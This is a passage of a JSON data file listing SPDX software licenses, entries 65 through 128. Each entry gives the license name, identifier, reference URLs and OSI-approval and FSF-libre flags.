807 "detailsUrl": "https://spdx.org/licenses/LiLiQ-R-1.1.json",
808 "referenceNumber": 65,
809 "name": "Licence Libre du Québec – Réciprocité version 1.1",
810 "licenseId": "LiLiQ-R-1.1",
811 "seeAlso": [
812 "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-liliq-r-v1-1/",
813 "http://opensource.org/licenses/LiLiQ-R-1.1"
814 ],
815 "isOsiApproved": true
816 },
817 {
818 "reference": "https://spdx.org/licenses/Noweb.html",
819 "isDeprecatedLicenseId": false,
820 "detailsUrl": "https://spdx.org/licenses/Noweb.json",
821 "referenceNumber": 66,
822 "name": "Noweb License",
823 "licenseId": "Noweb",
824 "seeAlso": [
825 "https://fedoraproject.org/wiki/Licensing/Noweb"
826 ],
827 "isOsiApproved": false
828 },
829 {
830 "reference": "https://spdx.org/licenses/CC0-1.0.html",
831 "isDeprecatedLicenseId": false,
832 "detailsUrl": "https://spdx.org/licenses/CC0-1.0.json",
833 "referenceNumber": 67,
834 "name": "Creative Commons Zero v1.0 Universal",
835 "licenseId": "CC0-1.0",
836 "seeAlso": [
837 "https://creativecommons.org/publicdomain/zero/1.0/legalcode"
838 ],
839 "isOsiApproved": false,
840 "isFsfLibre": true
841 },
842 {
843 "reference": "https://spdx.org/licenses/BSD-Protection.html",
844 "isDeprecatedLicenseId": false,
845 "detailsUrl": "https://spdx.org/licenses/BSD-Protection.json",
846 "referenceNumber": 68,
847 "name": "BSD Protection License",
848 "licenseId": "BSD-Protection",
849 "seeAlso": [
850 "https://fedoraproject.org/wiki/Licensing/BSD_Protection_License"
851 ],
852 "isOsiApproved": false
853 },
854 {
855 "reference": "https://spdx.org/licenses/CC-BY-NC-2.5.html",
856 "isDeprecatedLicenseId": false,
857 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.5.json",
858 "referenceNumber": 69,
859 "name": "Creative Commons Attribution Non Commercial 2.5 Generic",
860 "licenseId": "CC-BY-NC-2.5",
861 "seeAlso": [
862 "https://creativecommons.org/licenses/by-nc/2.5/legalcode"
863 ],
864 "isOsiApproved": false
865 },
866 {
867 "reference": "https://spdx.org/licenses/Zlib.html",
868 "isDeprecatedLicenseId": false,
869 "detailsUrl": "https://spdx.org/licenses/Zlib.json",
870 "referenceNumber": 70,
871 "name": "zlib License",
872 "licenseId": "Zlib",
873 "seeAlso": [
874 "http://www.zlib.net/zlib_license.html",
875 "https://opensource.org/licenses/Zlib"
876 ],
877 "isOsiApproved": true,
878 "isFsfLibre": true
879 },
880 {
881 "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.html",
882 "isDeprecatedLicenseId": false,
883 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.json",
884 "referenceNumber": 71,
885 "name": "GNU Free Documentation License v1.3 or later - invariants",
886 "licenseId": "GFDL-1.3-invariants-or-later",
887 "seeAlso": [
888 "https://www.gnu.org/licenses/fdl-1.3.txt"
889 ],
890 "isOsiApproved": false
891 },
892 {
893 "reference": "https://spdx.org/licenses/CC-BY-3.0-AT.html",
894 "isDeprecatedLicenseId": false,
895 "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-AT.json",
896 "referenceNumber": 72,
897 "name": "Creative Commons Attribution 3.0 Austria",
898 "licenseId": "CC-BY-3.0-AT",
899 "seeAlso": [
900 "https://creativecommons.org/licenses/by/3.0/at/legalcode"
901 ],
902 "isOsiApproved": false
903 },
904 {
905 "reference": "https://spdx.org/licenses/LPPL-1.3c.html",
906 "isDeprecatedLicenseId": false,
907 "detailsUrl": "https://spdx.org/licenses/LPPL-1.3c.json",
908 "referenceNumber": 73,
909 "name": "LaTeX Project Public License v1.3c",
910 "licenseId": "LPPL-1.3c",
911 "seeAlso": [
912 "http://www.latex-project.org/lppl/lppl-1-3c.txt",
913 "https://opensource.org/licenses/LPPL-1.3c"
914 ],
915 "isOsiApproved": true
916 },
917 {
918 "reference": "https://spdx.org/licenses/EPL-1.0.html",
919 "isDeprecatedLicenseId": false,
920 "detailsUrl": "https://spdx.org/licenses/EPL-1.0.json",
921 "referenceNumber": 74,
922 "name": "Eclipse Public License 1.0",
923 "licenseId": "EPL-1.0",
924 "seeAlso": [
925 "http://www.eclipse.org/legal/epl-v10.html",
926 "https://opensource.org/licenses/EPL-1.0"
927 ],
928 "isOsiApproved": true,
929 "isFsfLibre": true
930 },
931 {
932 "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.html",
933 "isDeprecatedLicenseId": false,
934 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.json",
935 "referenceNumber": 75,
936 "name": "GNU Free Documentation License v1.1 or later - invariants",
937 "licenseId": "GFDL-1.1-invariants-or-later",
938 "seeAlso": [
939 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
940 ],
941 "isOsiApproved": false
942 },
943 {
944 "reference": "https://spdx.org/licenses/ANTLR-PD-fallback.html",
945 "isDeprecatedLicenseId": false,
946 "detailsUrl": "https://spdx.org/licenses/ANTLR-PD-fallback.json",
947 "referenceNumber": 76,
948 "name": "ANTLR Software Rights Notice with license fallback",
949 "licenseId": "ANTLR-PD-fallback",
950 "seeAlso": [
951 "http://www.antlr2.org/license.html"
952 ],
953 "isOsiApproved": false
954 },
955 {
956 "reference": "https://spdx.org/licenses/OLDAP-2.4.html",
957 "isDeprecatedLicenseId": false,
958 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.4.json",
959 "referenceNumber": 77,
960 "name": "Open LDAP Public License v2.4",
961 "licenseId": "OLDAP-2.4",
962 "seeAlso": [
963 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcd1284c4a91a8a380d904eee68d1583f989ed386"
964 ],
965 "isOsiApproved": false
966 },
967 {
968 "reference": "https://spdx.org/licenses/OLDAP-2.3.html",
969 "isDeprecatedLicenseId": false,
970 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.3.json",
971 "referenceNumber": 78,
972 "name": "Open LDAP Public License v2.3",
973 "licenseId": "OLDAP-2.3",
974 "seeAlso": [
975 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dd32cf54a32d581ab475d23c810b0a7fbaf8d63c3"
976 ],
977 "isOsiApproved": false,
978 "isFsfLibre": true
979 },
980 {
981 "reference": "https://spdx.org/licenses/ZPL-2.1.html",
982 "isDeprecatedLicenseId": false,
983 "detailsUrl": "https://spdx.org/licenses/ZPL-2.1.json",
984 "referenceNumber": 79,
985 "name": "Zope Public License 2.1",
986 "licenseId": "ZPL-2.1",
987 "seeAlso": [
988 "http://old.zope.org/Resources/ZPL/"
989 ],
990 "isOsiApproved": true,
991 "isFsfLibre": true
992 },
993 {
994 "reference": "https://spdx.org/licenses/Apache-2.0.html",
995 "isDeprecatedLicenseId": false,
996 "detailsUrl": "https://spdx.org/licenses/Apache-2.0.json",
997 "referenceNumber": 80,
998 "name": "Apache License 2.0",
999 "licenseId": "Apache-2.0",
1000 "seeAlso": [
1001 "https://www.apache.org/licenses/LICENSE-2.0",
1002 "https://opensource.org/licenses/Apache-2.0"
1003 ],
1004 "isOsiApproved": true,
1005 "isFsfLibre": true
1006 },
1007 {
1008 "reference": "https://spdx.org/licenses/SGI-B-2.0.html",
1009 "isDeprecatedLicenseId": false,
1010 "detailsUrl": "https://spdx.org/licenses/SGI-B-2.0.json",
1011 "referenceNumber": 81,
1012 "name": "SGI Free Software License B v2.0",
1013 "licenseId": "SGI-B-2.0",
1014 "seeAlso": [
1015 "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.2.0.pdf"
1016 ],
1017 "isOsiApproved": false,
1018 "isFsfLibre": true
1019 },
1020 {
1021 "reference": "https://spdx.org/licenses/Hippocratic-2.1.html",
1022 "isDeprecatedLicenseId": false,
1023 "detailsUrl": "https://spdx.org/licenses/Hippocratic-2.1.json",
1024 "referenceNumber": 82,
1025 "name": "Hippocratic License 2.1",
1026 "licenseId": "Hippocratic-2.1",
1027 "seeAlso": [
1028 "https://firstdonoharm.dev/version/2/1/license.html",
1029 "https://github.com/EthicalSource/hippocratic-license/blob/58c0e646d64ff6fbee275bfe2b9492f914e3ab2a/LICENSE.txt"
1030 ],
1031 "isOsiApproved": false
1032 },
1033 {
1034 "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.html",
1035 "isDeprecatedLicenseId": false,
1036 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.json",
1037 "referenceNumber": 83,
1038 "name": "Creative Commons Attribution Share Alike 3.0 Germany",
1039 "licenseId": "CC-BY-SA-3.0-DE",
1040 "seeAlso": [
1041 "https://creativecommons.org/licenses/by-sa/3.0/de/legalcode"
1042 ],
1043 "isOsiApproved": false
1044 },
1045 {
1046 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.html",
1047 "isDeprecatedLicenseId": false,
1048 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.json",
1049 "referenceNumber": 84,
1050 "name": "Creative Commons Attribution Non Commercial Share Alike 1.0 Generic",
1051 "licenseId": "CC-BY-NC-SA-1.0",
1052 "seeAlso": [
1053 "https://creativecommons.org/licenses/by-nc-sa/1.0/legalcode"
1054 ],
1055 "isOsiApproved": false
1056 },
1057 {
1058 "reference": "https://spdx.org/licenses/LGPL-2.1-or-later.html",
1059 "isDeprecatedLicenseId": false,
1060 "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-or-later.json",
1061 "referenceNumber": 85,
1062 "name": "GNU Lesser General Public License v2.1 or later",
1063 "licenseId": "LGPL-2.1-or-later",
1064 "seeAlso": [
1065 "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
1066 "https://opensource.org/licenses/LGPL-2.1"
1067 ],
1068 "isOsiApproved": true,
1069 "isFsfLibre": true
1070 },
1071 {
1072 "reference": "https://spdx.org/licenses/CC-BY-3.0-US.html",
1073 "isDeprecatedLicenseId": false,
1074 "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-US.json",
1075 "referenceNumber": 86,
1076 "name": "Creative Commons Attribution 3.0 United States",
1077 "licenseId": "CC-BY-3.0-US",
1078 "seeAlso": [
1079 "https://creativecommons.org/licenses/by/3.0/us/legalcode"
1080 ],
1081 "isOsiApproved": false
1082 },
1083 {
1084 "reference": "https://spdx.org/licenses/TCP-wrappers.html",
1085 "isDeprecatedLicenseId": false,
1086 "detailsUrl": "https://spdx.org/licenses/TCP-wrappers.json",
1087 "referenceNumber": 87,
1088 "name": "TCP Wrappers License",
1089 "licenseId": "TCP-wrappers",
1090 "seeAlso": [
1091 "http://rc.quest.com/topics/openssh/license.php#tcpwrappers"
1092 ],
1093 "isOsiApproved": false
1094 },
1095 {
1096 "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.html",
1097 "isDeprecatedLicenseId": false,
1098 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.json",
1099 "referenceNumber": 88,
1100 "name": "GNU Free Documentation License v1.2 or later - invariants",
1101 "licenseId": "GFDL-1.2-invariants-or-later",
1102 "seeAlso": [
1103 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
1104 ],
1105 "isOsiApproved": false
1106 },
1107 {
1108 "reference": "https://spdx.org/licenses/Eurosym.html",
1109 "isDeprecatedLicenseId": false,
1110 "detailsUrl": "https://spdx.org/licenses/Eurosym.json",
1111 "referenceNumber": 89,
1112 "name": "Eurosym License",
1113 "licenseId": "Eurosym",
1114 "seeAlso": [
1115 "https://fedoraproject.org/wiki/Licensing/Eurosym"
1116 ],
1117 "isOsiApproved": false
1118 },
1119 {
1120 "reference": "https://spdx.org/licenses/GFDL-1.1.html",
1121 "isDeprecatedLicenseId": true,
1122 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1.json",
1123 "referenceNumber": 90,
1124 "name": "GNU Free Documentation License v1.1",
1125 "licenseId": "GFDL-1.1",
1126 "seeAlso": [
1127 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
1128 ],
1129 "isOsiApproved": false,
1130 "isFsfLibre": true
1131 },
1132 {
1133 "reference": "https://spdx.org/licenses/LPPL-1.0.html",
1134 "isDeprecatedLicenseId": false,
1135 "detailsUrl": "https://spdx.org/licenses/LPPL-1.0.json",
1136 "referenceNumber": 91,
1137 "name": "LaTeX Project Public License v1.0",
1138 "licenseId": "LPPL-1.0",
1139 "seeAlso": [
1140 "http://www.latex-project.org/lppl/lppl-1-0.txt"
1141 ],
1142 "isOsiApproved": false
1143 },
1144 {
1145 "reference": "https://spdx.org/licenses/LGPL-2.0+.html",
1146 "isDeprecatedLicenseId": true,
1147 "detailsUrl": "https://spdx.org/licenses/LGPL-2.0+.json",
1148 "referenceNumber": 92,
1149 "name": "GNU Library General Public License v2 or later",
1150 "licenseId": "LGPL-2.0+",
1151 "seeAlso": [
1152 "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
1153 ],
1154 "isOsiApproved": true
1155 },
1156 {
1157 "reference": "https://spdx.org/licenses/SGI-B-1.0.html",
1158 "isDeprecatedLicenseId": false,
1159 "detailsUrl": "https://spdx.org/licenses/SGI-B-1.0.json",
1160 "referenceNumber": 93,
1161 "name": "SGI Free Software License B v1.0",
1162 "licenseId": "SGI-B-1.0",
1163 "seeAlso": [
1164 "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.1.0.html"
1165 ],
1166 "isOsiApproved": false
1167 },
1168 {
1169 "reference": "https://spdx.org/licenses/APL-1.0.html",
1170 "isDeprecatedLicenseId": false,
1171 "detailsUrl": "https://spdx.org/licenses/APL-1.0.json",
1172 "referenceNumber": 94,
1173 "name": "Adaptive Public License 1.0",
1174 "licenseId": "APL-1.0",
1175 "seeAlso": [
1176 "https://opensource.org/licenses/APL-1.0"
1177 ],
1178 "isOsiApproved": true
1179 },
1180 {
1181 "reference": "https://spdx.org/licenses/libtiff.html",
1182 "isDeprecatedLicenseId": false,
1183 "detailsUrl": "https://spdx.org/licenses/libtiff.json",
1184 "referenceNumber": 95,
1185 "name": "libtiff License",
1186 "licenseId": "libtiff",
1187 "seeAlso": [
1188 "https://fedoraproject.org/wiki/Licensing/libtiff"
1189 ],
1190 "isOsiApproved": false
1191 },
1192 {
1193 "reference": "https://spdx.org/licenses/AFL-2.1.html",
1194 "isDeprecatedLicenseId": false,
1195 "detailsUrl": "https://spdx.org/licenses/AFL-2.1.json",
1196 "referenceNumber": 96,
1197 "name": "Academic Free License v2.1",
1198 "licenseId": "AFL-2.1",
1199 "seeAlso": [
1200 "http://opensource.linux-mirror.org/licenses/afl-2.1.txt"
1201 ],
1202 "isOsiApproved": true,
1203 "isFsfLibre": true
1204 },
1205 {
1206 "reference": "https://spdx.org/licenses/CC-BY-NC-1.0.html",
1207 "isDeprecatedLicenseId": false,
1208 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-1.0.json",
1209 "referenceNumber": 97,
1210 "name": "Creative Commons Attribution Non Commercial 1.0 Generic",
1211 "licenseId": "CC-BY-NC-1.0",
1212 "seeAlso": [
1213 "https://creativecommons.org/licenses/by-nc/1.0/legalcode"
1214 ],
1215 "isOsiApproved": false
1216 },
1217 {
1218 "reference": "https://spdx.org/licenses/GD.html",
1219 "isDeprecatedLicenseId": false,
1220 "detailsUrl": "https://spdx.org/licenses/GD.json",
1221 "referenceNumber": 98,
1222 "name": "GD License",
1223 "licenseId": "GD",
1224 "seeAlso": [
1225 "https://libgd.github.io/manuals/2.3.0/files/license-txt.html"
1226 ],
1227 "isOsiApproved": false
1228 },
1229 {
1230 "reference": "https://spdx.org/licenses/AFL-1.1.html",
1231 "isDeprecatedLicenseId": false,
1232 "detailsUrl": "https://spdx.org/licenses/AFL-1.1.json",
1233 "referenceNumber": 99,
1234 "name": "Academic Free License v1.1",
1235 "licenseId": "AFL-1.1",
1236 "seeAlso": [
1237 "http://opensource.linux-mirror.org/licenses/afl-1.1.txt",
1238 "http://wayback.archive.org/web/20021004124254/http://www.opensource.org/licenses/academic.php"
1239 ],
1240 "isOsiApproved": true,
1241 "isFsfLibre": true
1242 },
1243 {
1244 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.html",
1245 "isDeprecatedLicenseId": false,
1246 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.json",
1247 "referenceNumber": 100,
1248 "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 IGO",
1249 "licenseId": "CC-BY-NC-ND-3.0-IGO",
1250 "seeAlso": [
1251 "https://creativecommons.org/licenses/by-nc-nd/3.0/igo/legalcode"
1252 ],
1253 "isOsiApproved": false
1254 },
1255 {
1256 "reference": "https://spdx.org/licenses/Unicode-DFS-2015.html",
1257 "isDeprecatedLicenseId": false,
1258 "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2015.json",
1259 "referenceNumber": 101,
1260 "name": "Unicode License Agreement - Data Files and Software (2015)",
1261 "licenseId": "Unicode-DFS-2015",
1262 "seeAlso": [
1263 "https://web.archive.org/web/20151224134844/http://unicode.org/copyright.html"
1264 ],
1265 "isOsiApproved": false
1266 },
1267 {
1268 "reference": "https://spdx.org/licenses/GFDL-1.2-only.html",
1269 "isDeprecatedLicenseId": false,
1270 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-only.json",
1271 "referenceNumber": 102,
1272 "name": "GNU Free Documentation License v1.2 only",
1273 "licenseId": "GFDL-1.2-only",
1274 "seeAlso": [
1275 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
1276 ],
1277 "isOsiApproved": false,
1278 "isFsfLibre": true
1279 },
1280 {
1281 "reference": "https://spdx.org/licenses/MPL-1.1.html",
1282 "isDeprecatedLicenseId": false,
1283 "detailsUrl": "https://spdx.org/licenses/MPL-1.1.json",
1284 "referenceNumber": 103,
1285 "name": "Mozilla Public License 1.1",
1286 "licenseId": "MPL-1.1",
1287 "seeAlso": [
1288 "http://www.mozilla.org/MPL/MPL-1.1.html",
1289 "https://opensource.org/licenses/MPL-1.1"
1290 ],
1291 "isOsiApproved": true,
1292 "isFsfLibre": true
1293 },
1294 {
1295 "reference": "https://spdx.org/licenses/GPL-2.0-only.html",
1296 "isDeprecatedLicenseId": false,
1297 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-only.json",
1298 "referenceNumber": 104,
1299 "name": "GNU General Public License v2.0 only",
1300 "licenseId": "GPL-2.0-only",
1301 "seeAlso": [
1302 "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
1303 "https://opensource.org/licenses/GPL-2.0"
1304 ],
1305 "isOsiApproved": true,
1306 "isFsfLibre": true
1307 },
1308 {
1309 "reference": "https://spdx.org/licenses/CC-BY-NC-4.0.html",
1310 "isDeprecatedLicenseId": false,
1311 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-4.0.json",
1312 "referenceNumber": 105,
1313 "name": "Creative Commons Attribution Non Commercial 4.0 International",
1314 "licenseId": "CC-BY-NC-4.0",
1315 "seeAlso": [
1316 "https://creativecommons.org/licenses/by-nc/4.0/legalcode"
1317 ],
1318 "isOsiApproved": false
1319 },
1320 {
1321 "reference": "https://spdx.org/licenses/FreeImage.html",
1322 "isDeprecatedLicenseId": false,
1323 "detailsUrl": "https://spdx.org/licenses/FreeImage.json",
1324 "referenceNumber": 106,
1325 "name": "FreeImage Public License v1.0",
1326 "licenseId": "FreeImage",
1327 "seeAlso": [
1328 "http://freeimage.sourceforge.net/freeimage-license.txt"
1329 ],
1330 "isOsiApproved": false
1331 },
1332 {
1333 "reference": "https://spdx.org/licenses/SHL-0.51.html",
1334 "isDeprecatedLicenseId": false,
1335 "detailsUrl": "https://spdx.org/licenses/SHL-0.51.json",
1336 "referenceNumber": 107,
1337 "name": "Solderpad Hardware License, Version 0.51",
1338 "licenseId": "SHL-0.51",
1339 "seeAlso": [
1340 "https://solderpad.org/licenses/SHL-0.51/"
1341 ],
1342 "isOsiApproved": false
1343 },
1344 {
1345 "reference": "https://spdx.org/licenses/CNRI-Jython.html",
1346 "isDeprecatedLicenseId": false,
1347 "detailsUrl": "https://spdx.org/licenses/CNRI-Jython.json",
1348 "referenceNumber": 108,
1349 "name": "CNRI Jython License",
1350 "licenseId": "CNRI-Jython",
1351 "seeAlso": [
1352 "http://www.jython.org/license.html"
1353 ],
1354 "isOsiApproved": false
1355 },
1356 {
1357 "reference": "https://spdx.org/licenses/ZPL-1.1.html",
1358 "isDeprecatedLicenseId": false,
1359 "detailsUrl": "https://spdx.org/licenses/ZPL-1.1.json",
1360 "referenceNumber": 109,
1361 "name": "Zope Public License 1.1",
1362 "licenseId": "ZPL-1.1",
1363 "seeAlso": [
1364 "http://old.zope.org/Resources/License/ZPL-1.1"
1365 ],
1366 "isOsiApproved": false
1367 },
1368 {
1369 "reference": "https://spdx.org/licenses/Afmparse.html",
1370 "isDeprecatedLicenseId": false,
1371 "detailsUrl": "https://spdx.org/licenses/Afmparse.json",
1372 "referenceNumber": 110,
1373 "name": "Afmparse License",
1374 "licenseId": "Afmparse",
1375 "seeAlso": [
1376 "https://fedoraproject.org/wiki/Licensing/Afmparse"
1377 ],
1378 "isOsiApproved": false
1379 },
1380 {
1381 "reference": "https://spdx.org/licenses/OLDAP-2.1.html",
1382 "isDeprecatedLicenseId": false,
1383 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.1.json",
1384 "referenceNumber": 111,
1385 "name": "Open LDAP Public License v2.1",
1386 "licenseId": "OLDAP-2.1",
1387 "seeAlso": [
1388 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db0d176738e96a0d3b9f85cb51e140a86f21be715"
1389 ],
1390 "isOsiApproved": false
1391 },
1392 {
1393 "reference": "https://spdx.org/licenses/Rdisc.html",
1394 "isDeprecatedLicenseId": false,
1395 "detailsUrl": "https://spdx.org/licenses/Rdisc.json",
1396 "referenceNumber": 112,
1397 "name": "Rdisc License",
1398 "licenseId": "Rdisc",
1399 "seeAlso": [
1400 "https://fedoraproject.org/wiki/Licensing/Rdisc_License"
1401 ],
1402 "isOsiApproved": false
1403 },
1404 {
1405 "reference": "https://spdx.org/licenses/Imlib2.html",
1406 "isDeprecatedLicenseId": false,
1407 "detailsUrl": "https://spdx.org/licenses/Imlib2.json",
1408 "referenceNumber": 113,
1409 "name": "Imlib2 License",
1410 "licenseId": "Imlib2",
1411 "seeAlso": [
1412 "http://trac.enlightenment.org/e/browser/trunk/imlib2/COPYING",
1413 "https://git.enlightenment.org/legacy/imlib2.git/tree/COPYING"
1414 ],
1415 "isOsiApproved": false,
1416 "isFsfLibre": true
1417 },
1418 {
1419 "reference": "https://spdx.org/licenses/BSD-4-Clause-Shortened.html",
1420 "isDeprecatedLicenseId": false,
1421 "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-Shortened.json",
1422 "referenceNumber": 114,
1423 "name": "BSD 4 Clause Shortened",
1424 "licenseId": "BSD-4-Clause-Shortened",
1425 "seeAlso": [
1426 "https://metadata.ftp-master.debian.org/changelogs//main/a/arpwatch/arpwatch_2.1a15-7_copyright"
1427 ],
1428 "isOsiApproved": false
1429 },
1430 {
1431 "reference": "https://spdx.org/licenses/Sendmail.html",
1432 "isDeprecatedLicenseId": false,
1433 "detailsUrl": "https://spdx.org/licenses/Sendmail.json",
1434 "referenceNumber": 115,
1435 "name": "Sendmail License",
1436 "licenseId": "Sendmail",
1437 "seeAlso": [
1438 "http://www.sendmail.com/pdfs/open_source/sendmail_license.pdf",
1439 "https://web.archive.org/web/20160322142305/https://www.sendmail.com/pdfs/open_source/sendmail_license.pdf"
1440 ],
1441 "isOsiApproved": false
1442 },
1443 {
1444 "reference": "https://spdx.org/licenses/CC-BY-2.5.html",
1445 "isDeprecatedLicenseId": false,
1446 "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5.json",
1447 "referenceNumber": 116,
1448 "name": "Creative Commons Attribution 2.5 Generic",
1449 "licenseId": "CC-BY-2.5",
1450 "seeAlso": [
1451 "https://creativecommons.org/licenses/by/2.5/legalcode"
1452 ],
1453 "isOsiApproved": false
1454 },
1455 {
1456 "reference": "https://spdx.org/licenses/AAL.html",
1457 "isDeprecatedLicenseId": false,
1458 "detailsUrl": "https://spdx.org/licenses/AAL.json",
1459 "referenceNumber": 117,
1460 "name": "Attribution Assurance License",
1461 "licenseId": "AAL",
1462 "seeAlso": [
1463 "https://opensource.org/licenses/attribution"
1464 ],
1465 "isOsiApproved": true
1466 },
1467 {
1468 "reference": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.html",
1469 "isDeprecatedLicenseId": false,
1470 "detailsUrl": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.json",
1471 "referenceNumber": 118,
1472 "name": "Mozilla Public License 2.0 (no copyleft exception)",
1473 "licenseId": "MPL-2.0-no-copyleft-exception",
1474 "seeAlso": [
1475 "http://www.mozilla.org/MPL/2.0/",
1476 "https://opensource.org/licenses/MPL-2.0"
1477 ],
1478 "isOsiApproved": true
1479 },
1480 {
1481 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.html",
1482 "isDeprecatedLicenseId": false,
1483 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.json",
1484 "referenceNumber": 119,
1485 "name": "Creative Commons Attribution Non Commercial No Derivatives 2.5 Generic",
1486 "licenseId": "CC-BY-NC-ND-2.5",
1487 "seeAlso": [
1488 "https://creativecommons.org/licenses/by-nc-nd/2.5/legalcode"
1489 ],
1490 "isOsiApproved": false
1491 },
1492 {
1493 "reference": "https://spdx.org/licenses/CC-BY-3.0-NL.html",
1494 "isDeprecatedLicenseId": false,
1495 "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-NL.json",
1496 "referenceNumber": 120,
1497 "name": "Creative Commons Attribution 3.0 Netherlands",
1498 "licenseId": "CC-BY-3.0-NL",
1499 "seeAlso": [
1500 "https://creativecommons.org/licenses/by/3.0/nl/legalcode"
1501 ],
1502 "isOsiApproved": false
1503 },
1504 {
1505 "reference": "https://spdx.org/licenses/LPL-1.02.html",
1506 "isDeprecatedLicenseId": false,
1507 "detailsUrl": "https://spdx.org/licenses/LPL-1.02.json",
1508 "referenceNumber": 121,
1509 "name": "Lucent Public License v1.02",
1510 "licenseId": "LPL-1.02",
1511 "seeAlso": [
1512 "http://plan9.bell-labs.com/plan9/license.html",
1513 "https://opensource.org/licenses/LPL-1.02"
1514 ],
1515 "isOsiApproved": true,
1516 "isFsfLibre": true
1517 },
1518 {
1519 "reference": "https://spdx.org/licenses/ECL-1.0.html",
1520 "isDeprecatedLicenseId": false,
1521 "detailsUrl": "https://spdx.org/licenses/ECL-1.0.json",
1522 "referenceNumber": 122,
1523 "name": "Educational Community License v1.0",
1524 "licenseId": "ECL-1.0",
1525 "seeAlso": [
1526 "https://opensource.org/licenses/ECL-1.0"
1527 ],
1528 "isOsiApproved": true
1529 },
1530 {
1531 "reference": "https://spdx.org/licenses/OFL-1.0-no-RFN.html",
1532 "isDeprecatedLicenseId": false,
1533 "detailsUrl": "https://spdx.org/licenses/OFL-1.0-no-RFN.json",
1534 "referenceNumber": 123,
1535 "name": "SIL Open Font License 1.0 with no Reserved Font Name",
1536 "licenseId": "OFL-1.0-no-RFN",
1537 "seeAlso": [
1538 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
1539 ],
1540 "isOsiApproved": false
1541 },
1542 {
1543 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.html",
1544 "isDeprecatedLicenseId": false,
1545 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.json",
1546 "referenceNumber": 124,
1547 "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Germany",
1548 "licenseId": "CC-BY-NC-SA-3.0-DE",
1549 "seeAlso": [
1550 "https://creativecommons.org/licenses/by-nc-sa/3.0/de/legalcode"
1551 ],
1552 "isOsiApproved": false
1553 },
1554 {
1555 "reference": "https://spdx.org/licenses/CC-BY-SA-3.0.html",
1556 "isDeprecatedLicenseId": false,
1557 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0.json",
1558 "referenceNumber": 125,
1559 "name": "Creative Commons Attribution Share Alike 3.0 Unported",
1560 "licenseId": "CC-BY-SA-3.0",
1561 "seeAlso": [
1562 "https://creativecommons.org/licenses/by-sa/3.0/legalcode"
1563 ],
1564 "isOsiApproved": false
1565 },
1566 {
1567 "reference": "https://spdx.org/licenses/NTP.html",
1568 "isDeprecatedLicenseId": false,
1569 "detailsUrl": "https://spdx.org/licenses/NTP.json",
1570 "referenceNumber": 126,
1571 "name": "NTP License",
1572 "licenseId": "NTP",
1573 "seeAlso": [
1574 "https://opensource.org/licenses/NTP"
1575 ],
1576 "isOsiApproved": true
1577 },
1578 {
1579 "reference": "https://spdx.org/licenses/MPL-2.0.html",
1580 "isDeprecatedLicenseId": false,
1581 "detailsUrl": "https://spdx.org/licenses/MPL-2.0.json",
1582 "referenceNumber": 127,
1583 "name": "Mozilla Public License 2.0",
1584 "licenseId": "MPL-2.0",
1585 "seeAlso": [
1586 "https://www.mozilla.org/MPL/2.0/",
1587 "https://opensource.org/licenses/MPL-2.0"
1588 ],
1589 "isOsiApproved": true,
1590 "isFsfLibre": true
1591 },
1592 {
1593 "reference": "https://spdx.org/licenses/APSL-1.2.html",
1594 "isDeprecatedLicenseId": false,
1595 "detailsUrl": "https://spdx.org/licenses/APSL-1.2.json",
1596 "referenceNumber": 128,
1597 "name": "Apple Public Source License 1.2",
